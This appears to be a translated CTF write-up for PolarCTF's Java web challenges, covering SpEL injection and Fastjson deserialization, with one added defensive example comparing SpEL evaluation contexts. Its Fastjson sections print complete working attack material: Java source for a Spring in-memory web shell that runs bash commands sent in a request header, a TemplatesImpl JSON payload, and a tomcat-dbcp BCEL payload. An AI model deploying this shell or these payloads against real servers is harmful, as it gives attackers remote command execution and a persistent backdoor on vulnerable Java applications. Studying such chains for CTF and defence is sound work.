Reference: infernity's article "PolarCTF range: full solutions to the WEB-track Java challenges" on 先知社区 (XianZhi community).

ezjava

Source code:

[screenshot]

One look at the parseExpression call and it is obviously SpEL injection.

Try the most basic Runtime command execution first:

[screenshot]

ls / did not throw an error, so the target is Linux, and there is no echo of the command output.

Use a blind (no-echo) payload:

[screenshot]
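As an added defensive illustration (not code from the challenge or from the referenced article), the hypothetical `SpelContextDemo` below shows why `parseExpression(...).getValue()` under a `StandardEvaluationContext` is the injectable pattern here, and how `SimpleEvaluationContext` rejects the `T(...)` type references that the payloads above depend on:

```java
import org.springframework.expression.EvaluationException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelContextDemo {
    // Hypothetical root object that an application might expose to expressions.
    public static class Greeting {
        public String getName() { return "polar"; }
    }

    // Vulnerable pattern: StandardEvaluationContext resolves T() type references,
    // so a user-controlled expression can reach arbitrary JDK classes.
    static Object evalUnrestricted(String expr) {
        ExpressionParser parser = new SpelExpressionParser();
        return parser.parseExpression(expr)
                     .getValue(new StandardEvaluationContext(new Greeting()));
    }

    // Hardened pattern: SimpleEvaluationContext (read-only data binding) only allows
    // property access on the root object; T(), constructors and bean references throw.
    static Object evalRestricted(String expr) {
        ExpressionParser parser = new SpelExpressionParser();
        SimpleEvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        return parser.parseExpression(expr).getValue(ctx, new Greeting());
    }

    public static void main(String[] args) {
        // Constructed inputs: a benign property lookup and a type-reference probe.
        String benign = "name";
        String probe = "T(java.lang.System).getProperty('os.name')";

        System.out.println("restricted, benign: " + evalRestricted(benign)); // polar
        try {
            evalRestricted(probe);
        } catch (EvaluationException e) {
            // SpelEvaluationException: type reference is not allowed in this context
            System.out.println("restricted, probe rejected: " + e.getMessage());
        }
        // The same probe resolves under the standard context, which is the bug class here.
        System.out.println("unrestricted, probe: " + evalUnrestricted(probe));
    }
}
```

Requires spring-expression on the classpath; the restricted context has been available since Spring 4.3.15 / 5.0.5.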

Fastjson

Pitfalls ahead!

Spring memory shell:

```java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class shell extends AbstractTranslet {
    public shell() {
        try {
            org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
            javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
            javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
            String[] cmd = new String[]{"bash", "-c", httprequest.getHeader("xiaofuc")}; // add an Infernity request header followed by the command
            byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
            httpresponse.getWriter().write(new String(result));
            httpresponse.getWriter().flush();
            httpresponse.getWriter().close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws
            TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {
    }
}
```

I used to compile with javac from the command line, but it kept failing because of dependency and JDK version problems.

Only then did I discover that IDEA can compile it with one click:

[screenshot]

Open PowerShell and Base64-encode the class file:

[screenshot]

Payload:

```json
{"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes": ["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"],'_name': 'xiaofuc','_tfactory': {},"_outputProperties": {}}
```

Then add the following to the request headers:

xiaofuc: cat fastFLAG.txt

[screenshot]

FastjsonBCEL

Seeing that the dependency version was 1.2.24, I first wanted to use the TemplatesImpl chain, but later found it didn't work, since the dependencies contain no CC chain.

Noticing that tomcat-dbcp is also loaded, and combining that with the challenge name, BCEL injection comes to mind.

Payload:

```json
{
    {
        "aaa": {
            "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
            "driverClassLoader": {
                "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
            },
            "driverClassName": "$$BCEL$$$l$8b$I$A$..."
        }
    }:"bbb"
}
```

Use the Spring memory shell from above as the BCEL-encoded malicious bytecode and it works.

[screenshot]